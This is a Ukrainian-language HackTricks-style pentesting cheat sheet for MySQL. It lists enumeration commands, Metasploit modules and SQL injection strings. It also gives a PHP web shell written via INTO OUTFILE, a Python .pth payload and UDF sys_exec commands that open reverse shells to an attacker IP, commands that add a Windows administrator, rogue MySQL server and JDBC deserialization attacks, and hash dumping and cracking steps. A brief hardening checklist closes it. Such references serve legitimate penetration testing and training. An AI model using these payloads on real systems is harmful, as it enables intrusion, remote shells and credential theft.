3306 - Pentesting Mysql

Основна інформація

MySQL можна описати як відкриту систему управління реляційними базами даних (RDBMS), яка доступна безкоштовно. Вона працює на Structured Query Language (SQL), що дозволяє управляти та маніпулювати базами даних.

Порт за замовчуванням: 3306

3306/tcp open  mysql

Підключення

Локально

mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)

Віддалений

mysql -h <Hostname> -u root
mysql -h <Hostname> -u root@localhost

External Enumeration

Деякі дії з перерахунку вимагають дійсних облікових даних

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
msf> use auxiliary/scanner/mysql/mysql_version
msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf> use auxiliary/scanner/mysql/mysql_hashdump #Creds
msf> use auxiliary/admin/mysql/mysql_enum #Creds
msf> use auxiliary/scanner/mysql/mysql_schemadump #Creds
msf> use exploit/windows/mysql/mysql_start_up #Execute commands Windows, Creds

Brute force

Записати будь-які бінарні дані

CONVERT(unhex("6f6e2e786d6c55540900037748b75c7249b75"), BINARY)
CONVERT(from_base64("aG9sYWFhCg=="), BINARY)

Команди MySQL

show databases;
use <database>;
connect <database>;
show tables;
describe <table_name>;
show columns from <table>;

select version(); #version
select @@version(); #version
select user(); #User
select database(); #database name

#Get a shell with the mysql client user
\! sh

#Basic MySQLi
Union Select 1,2,3,4,group_concat(0x7c,table_name,0x7C) from information_schema.tables
Union Select 1,2,3,4,column_name from information_schema.columns where table_name="<TABLE NAME>"

#Read & Write
## Yo need FILE privilege to read & write to files.
select load_file('/var/lib/mysql-files/key.txt'); #Read file
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/back.php'

#Try to change MySQL root password
UPDATE mysql.user SET Password=PASSWORD('MyNewPass') WHERE User='root';
UPDATE mysql.user SET authentication_string=PASSWORD('MyNewPass') WHERE User='root';
FLUSH PRIVILEGES;
quit;

mysql -u username -p < manycommands.sql #A file with all the commands you want to execute
mysql -u root -h 127.0.0.1 -e 'show databases;'

Перерахунок дозволів MySQL

#Mysql
SHOW GRANTS [FOR user];
SHOW GRANTS;
SHOW GRANTS FOR 'root'@'localhost';
SHOW GRANTS FOR CURRENT_USER();

# Get users, permissions & hashes
SELECT * FROM mysql.user;

#From DB
select * from mysql.user where user='root';
## Get users with file_priv
select user,file_priv from mysql.user where file_priv='Y';
## Get users with Super_priv
select user,Super_priv from mysql.user where Super_priv='Y';

# List functions
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION';
#@ Functions not from sys. db
SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' AND routine_schema!='sys';

Ви можете побачити в документації значення кожного привілею: https://dev.mysql.com/doc/refman/8.0/en/privileges-provided.html

MySQL File RCE

{{#ref}} ../pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md {{#endref}}

INTO OUTFILE → Python .pth RCE (специфічні конфігураційні хуки сайту)

Зловживаючи класичним примітивом INTO OUTFILE, можливо отримати випадкове виконання коду на цілях, які пізніше виконують Python скрипти.

1. Використовуйте INTO OUTFILE, щоб скинути власний .pth файл у будь-який каталог, що автоматично завантажується site.py (наприклад, .../lib/python3.10/site-packages/).
2. Файл .pth може містити один рядок, що починається з import , за яким слідує випадковий код Python, який буде виконуватись щоразу, коли запускається інтерпретатор.
3. Коли інтерпретатор неявно виконується CGI-скриптом (наприклад, /cgi-bin/ml-draw.py з shebang #!/bin/python), корисне навантаження виконується з тими ж привілеями, що й процес веб-сервера (FortiWeb виконував його як root → повне попереднє виконання коду).

Приклад корисного навантаження .pth (один рядок, пробіли не можуть бути включені в фінальне SQL навантаження, тому може знадобитися hex/UNHEX() або конкатенація рядків):

import os,sys,subprocess,base64;subprocess.call("bash -c 'bash -i >& /dev/tcp/10.10.14.66/4444 0>&1'",shell=True)

Приклад створення файлу через запит UNION (символи пробілу замінені на /**/ для обходу фільтра пробілів sscanf("%128s") і збереження загальної довжини ≤128 байт):

'/**/UNION/**/SELECT/**/token/**/FROM/**/fabric_user.user_table/**/INTO/**/OUTFILE/**/'../../lib/python3.10/site-packages/x.pth'

Важливі обмеження та обходи:

• INTO OUTFILE не може перезаписати існуючі файли; виберіть нове ім'я файлу.
• Шлях до файлу визначається відносно CWD MySQL, тому префікс ../../ допомагає скоротити шлях і обійти обмеження абсолютного шляху.
• Якщо введення зловмисника витягується за допомогою %128s (або подібного), будь-який пробіл обірве корисне навантаження; використовуйте коментарі MySQL /**/ або /*!*/ для заміни пробілів.
• Користувач MySQL, який виконує запит, потребує привілею FILE, але в багатьох пристроях (наприклад, FortiWeb) служба працює як root, надаючи доступ на запис майже скрізь.

Після скидання .pth просто запитайте будь-який CGI, оброблений інтерпретатором python, щоб отримати виконання коду:

GET /cgi-bin/ml-draw.py HTTP/1.1
Host: <target>

Python-процес автоматично імпортує шкідливий .pth і виконує оболонковий вантаж.

# Attacker
$ nc -lvnp 4444
id
uid=0(root) gid=0(root) groups=0(root)

MySQL довільне читання файлів клієнтом

Насправді, коли ви намагаєтеся завантажити дані локально в таблицю, вміст файлу сервер MySQL або MariaDB запитує у клієнта, щоб прочитати його і надіслати вміст. Отже, якщо ви можете підробити клієнт mysql, щоб підключитися до свого власного сервера MySQL, ви можете читати довільні файли.
Зверніть увагу, що це поведінка при використанні:

load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

(Зверніть увагу на слово "local")
Оскільки без "local" ви можете отримати:

mysql> load data infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

Initial PoC: https://github.com/allyshka/Rogue-MySql-Server
У цій статті ви можете побачити повний опис атаки і навіть як розширити її до RCE: https://paper.seebug.org/1113/
Тут ви можете знайти огляд атаки: http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/

​

POST

Mysql User

Це буде дуже цікаво, якщо mysql працює як root:

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | grep "user"
systemctl status mysql 2>/dev/null | grep -o ".\{0,0\}user.\{0,50\}" | cut -d '=' -f2 | cut -d ' ' -f1

Небезпечні налаштування mysqld.cnf

У конфігурації служб MySQL використовуються різні налаштування для визначення її роботи та заходів безпеки:

• Налаштування user використовується для призначення користувача, під яким буде виконуватися служба MySQL.
• password застосовується для встановлення пароля, пов'язаного з користувачем MySQL.
• admin_address вказує IP-адресу, яка слухає TCP/IP з'єднання на адміністративному мережевому інтерфейсі.
• Змінна debug вказує на поточні налаштування налагодження, включаючи чутливу інформацію в журналах.
• sql_warnings керує тим, чи генеруються інформаційні рядки для операторів INSERT з одним рядком, коли виникають попередження, що містять чутливі дані в журналах.
• З secure_file_priv обсяг операцій імпорту та експорту даних обмежується для підвищення безпеки.

Підвищення привілеїв

# Get current user (an all users) privileges and hashes
use mysql;
select user();
select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user;

# Get users, permissions & creds
SELECT * FROM mysql.user;
mysql -u root --password=<PASSWORD> -e "SELECT * FROM mysql.user;"

# Create user and give privileges
create user test identified by 'test';
grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;

# Get a shell (with your permissions, usefull for sudo/suid privesc)
\! sh

Підвищення привілеїв через бібліотеку

Якщо mysql сервер працює від імені root (або іншого більш привілейованого користувача), ви можете змусити його виконувати команди. Для цього вам потрібно використовувати функції, визначені користувачем. А щоб створити функцію, визначену користувачем, вам знадобиться бібліотека для ОС, на якій працює mysql.

Зловмисну бібліотеку можна знайти всередині sqlmap і всередині metasploit, виконавши locate "*lib_mysqludf_sys*". Файли .so є linux бібліотеками, а .dll - це Windows бібліотеки, виберіть ту, яка вам потрібна.

Якщо у вас немає цих бібліотек, ви можете або пошукати їх, або завантажити цей linux C код і скомпілювати його всередині вразливої linux машини:

gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

Тепер, коли у вас є бібліотека, увійдіть у Mysql як привілейований користувач (root?) і дотримуйтесь наступних кроків:

Linux

# Use a database
use mysql;
# Create a table to load the library and move it to the plugins dir
create table npn(line blob);
# Load the binary library inside the table
## You might need to change the path and file name
insert into npn values(load_file('/tmp/lib_mysqludf_sys.so'));
# Get the plugin_dir path
show variables like '%plugin%';
# Supposing the plugin dir was /usr/lib/x86_64-linux-gnu/mariadb19/plugin/
# dump in there the library
select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so';
# Create a function to execute commands
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
# Execute commands
select sys_exec('id > /tmp/out.txt; chmod 777 /tmp/out.txt');
select sys_exec('bash -c "bash -i >& /dev/tcp/10.10.14.66/1234 0>&1"');

Windows

# CHech the linux comments for more indications
USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://temp//lib_mysqludf_sys.dll'));
show variables like '%plugin%';
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");

Витягування облікових даних MySQL з файлів

Всередині /etc/mysql/debian.cnf ви можете знайти пароль у відкритому вигляді користувача debian-sys-maint

cat /etc/mysql/debian.cnf

Ви можете використовувати ці облікові дані для входу в базу даних mysql.

Всередині файлу: /var/lib/mysql/mysql/user.MYD ви можете знайти всі хеші користувачів MySQL (ті, які ви можете витягти з mysql.user всередині бази даних).

Ви можете витягти їх, виконавши:

grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Увімкнення журналювання

Ви можете увімкнути журналювання запитів mysql, відредагувавши файл /etc/mysql/my.cnf, розкоментувавши наступні рядки:

Корисні файли

Конфігураційні файли

• windows *
• config.ini
• my.ini
• windows\my.ini
• winnt\my.ini
• <InstDir>/mysql/data/
• unix
• my.cnf
• /etc/my.cnf
• /etc/mysql/my.cnf
• /var/lib/mysql/my.cnf
• ~/.my.cnf
• /etc/my.cnf
• Історія команд
• ~/.mysql.history
• Журнали
• connections.log
• update.log
• common.log

За замовчуванням MySQL База даних/Таблиці

HackTricks Автоматичні команди

Protocol_Name: MySql    #Protocol Abbreviation if there is one.
Port_Number:  3306     #Comma separated if there is more than one.
Protocol_Description: MySql     #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for MySql
Note: |
MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-mysql.html

Entry_2:
Name: Nmap
Description: Nmap with MySql Scripts
Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306

Entry_3:
Name: MySql
Description: Attempt to connect to mysql server
Command: mysql -h {IP} -u {Username}@localhost

Entry_4:
Name: MySql consolesless mfs enumeration
Description: MySql enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'

2023-2025 Highlights (new)

JDBC propertiesTransform deserialization (CVE-2023-21971)

З Connector/J <= 8.0.32 зловмисник, який може вплинути на JDBC URL (наприклад, у сторонньому програмному забезпеченні, яке запитує рядок підключення), може запитати завантаження довільних класів на стороні клієнта через параметр propertiesTransform. Якщо гаджет, присутній у class-path, може бути завантажений, це призводить до віддаленого виконання коду в контексті JDBC клієнта (попередня автентифікація, оскільки дійсні облікові дані не потрібні). Мінімальний PoC виглядає так:

jdbc:mysql://<attacker-ip>:3306/test?user=root&password=root&propertiesTransform=com.evil.Evil

Запуск Evil.class може бути таким же простим, як розміщення його в клас-паті вразливої програми або дозволення зловмисному MySQL серверу надсилати шкідливий серіалізований об'єкт. Проблему було виправлено в Connector/J 8.0.33 – оновіть драйвер або явно встановіть propertiesTransform у списку дозволених. (Дивіться опис Snyk для деталей)

Атаки зловмисного / фальшивого MySQL сервера проти JDBC клієнтів

Кілька інструментів з відкритим кодом реалізують частковий протокол MySQL для атаки на JDBC клієнтів, які підключаються назовні:

• mysql-fake-server (Java, підтримує експлойти для читання файлів і десеріалізації)
• rogue_mysql_server (Python, подібні можливості)

Типові шляхи атаки:

1. Програма-жертва завантажує mysql-connector-j з allowLoadLocalInfile=true або autoDeserialize=true.
2. Зловмисник контролює DNS / запис хоста так, щоб ім'я хоста БД розв'язувалося на машину під їх контролем.
3. Зловмисний сервер відповідає з підготовленими пакетами, які викликають або LOCAL INFILE довільне читання файлів, або десеріалізацію Java → RCE.

Приклад однорядкового коду для запуску фальшивого сервера (Java):

java -jar fake-mysql-cli.jar -p 3306  # from 4ra1n/mysql-fake-server

Потім вкажіть жертві застосунку jdbc:mysql://attacker:3306/test?allowLoadLocalInfile=true і прочитайте /etc/passwd, закодувавши ім'я файлу в base64 у полі username (fileread_/etc/passwd → base64ZmlsZXJlYWRfL2V0Yy9wYXNzd2Q=).

Злом хешів caching_sha2_password

MySQL ≥ 8.0 зберігає хеші паролів як $mysql-sha2$ (SHA-256). Як Hashcat (режим 21100), так і John-the-Ripper (--format=mysql-sha2) підтримують офлайн злом з 2023 року. Вивантажте стовпець authentication_string і подайте його безпосередньо:

# extract hashes
echo "$mysql-sha2$AABBCC…" > hashes.txt
# Hashcat
hashcat -a 0 -m 21100 hashes.txt /path/to/wordlist
# John the Ripper
john --format=mysql-sha2 hashes.txt --wordlist=/path/to/wordlist

Перелік заходів з посилення безпеки (2025)

• Встановіть LOCAL_INFILE=0 та --secure-file-priv=/var/empty, щоб знищити більшість примітивів читання/запису файлів.
• Видаліть привілей FILE з облікових записів додатків.
• У Connector/J встановіть allowLoadLocalInfile=false, allowUrlInLocalInfile=false, autoDeserialize=false, propertiesTransform= (порожньо).
• Вимкніть невикористовувані плагіни аутентифікації та вимагайте TLS (require_secure_transport = ON).
• Моніторте команди CREATE FUNCTION, INSTALL COMPONENT, INTO OUTFILE, LOAD DATA LOCAL та раптові команди SET GLOBAL.

Посилання

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)

• Oracle MySQL Connector/J propertiesTransform RCE – CVE-2023-21971 (Snyk)

• mysql-fake-server – Rogue MySQL server for JDBC client attacks

• Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)